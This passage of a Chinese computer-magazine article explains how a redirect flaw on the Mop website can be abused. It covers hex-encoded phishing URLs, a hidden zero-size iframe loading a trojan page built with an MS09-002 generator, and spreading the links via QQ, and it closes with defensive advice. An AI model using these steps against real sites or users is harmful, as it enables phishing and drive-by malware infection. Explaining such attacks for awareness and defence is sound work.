[网站钓鱼]我“代表”猫扑欺骗你!

　　安全小百科：URL16进制加密是将URL中的单个字符转换成16进制，之后每个转换后的双位16进制前面加上%再连在一起就是加密后的地址了。以加密baidu.com为例，baidu.com加密后就是%62%61%69%64%75%2E%63%6F%6D（图4）。

 

挂马攻击演示

　　除了伪装钓鱼网页之外，这个跨站漏洞还可以被黑客用作挂马攻击，挂马的关键就是制作挂马网页。

　　第一步：黑客在挂马之前先就要准备网页木马，他们通常会使用网页木马生成器，例如使用的《MS09-002网页木马生成器》。

　　打开这款生成器，在“木马下载地址”输入上传到指定空间的特洛伊木马地址，例如http://xinbqibar.cn/1.exe（图5），然后点击“生成”按钮，此时生成器会生成一个HTML网页，也就是黑客使用的挂马网页。

 

　　第二步：将挂马网页上传到空间中，再复制上传后的网页木马链接地址，然后用记事本打开钓鱼页面，在钓鱼页面的HTML代码后面输入IFRAME框架挂马代码“<iframe src=http://网页木马链接地址 width=0 height=0></iframe>”(图6)。这样钓鱼页面就跟挂马页面有关联了，当用户访问钓鱼页面的同事就激活了挂马页面。

 

　　安全小百科：IFRAME是HTML语言中的框架标签。HTML语言中< iframe >都是成对出现的，代码结束的时候则需要多出一个斜杠“ /” 表示代码结束。代码中的width表示框架的宽度为0，Height表示高度也为0，也就代表这个IFRAME框架既没有高度也没有宽度，那么这个框架就隐藏了。

　　第三步：然后钓鱼页面上传到空间中，再将这个页面地址经过URL１６进制加密后添加到“URL＝”号之后，这样一个既能够挂马，又能够钓鱼的黑客页面就制作完成了。

　　黑客会将这样的页面通过ＱＱ群发等方式广为传播，对于那些缺乏防挂马软件的用户而言，不是中马就是被钓鱼，而且这一切都是伪装在网友们都极其信任并且极其有人气的猫扑网站之下，那些不设防的用户极少能够逃过这样的连环套。

漏洞修补之法

　　对猫扑而言，要加强网站的安全性检测，特别是要增加对外部链接地址的过滤，对url=后面的外部链接参数过滤要在所有页面进行，不能遗漏一个。

　　对普通用户而言，要避免被这个漏洞祸害，要有这样的信念，天下没有免费的午餐。例如你在猫扑什么也没做，突然通知你中了一个大奖，这种基本上是没有可能的。大家最好不要相信网络中奖，十之八九都是假的。

　　如何你看到一个网址后面有大量的加密，就要多一个心眼，最好启动带有网页木马拦截功能的安全辅助工具，再打开网页，避免网页木马的骚扰。此外，大家还要勤打补丁，及时升级杀毒软件病毒库。

本文出处 电脑报（http://www.shudoo.com）

第1页:我“代表”猫扑欺骗你!(1)   第2页:我“代表”猫扑欺骗你!(2)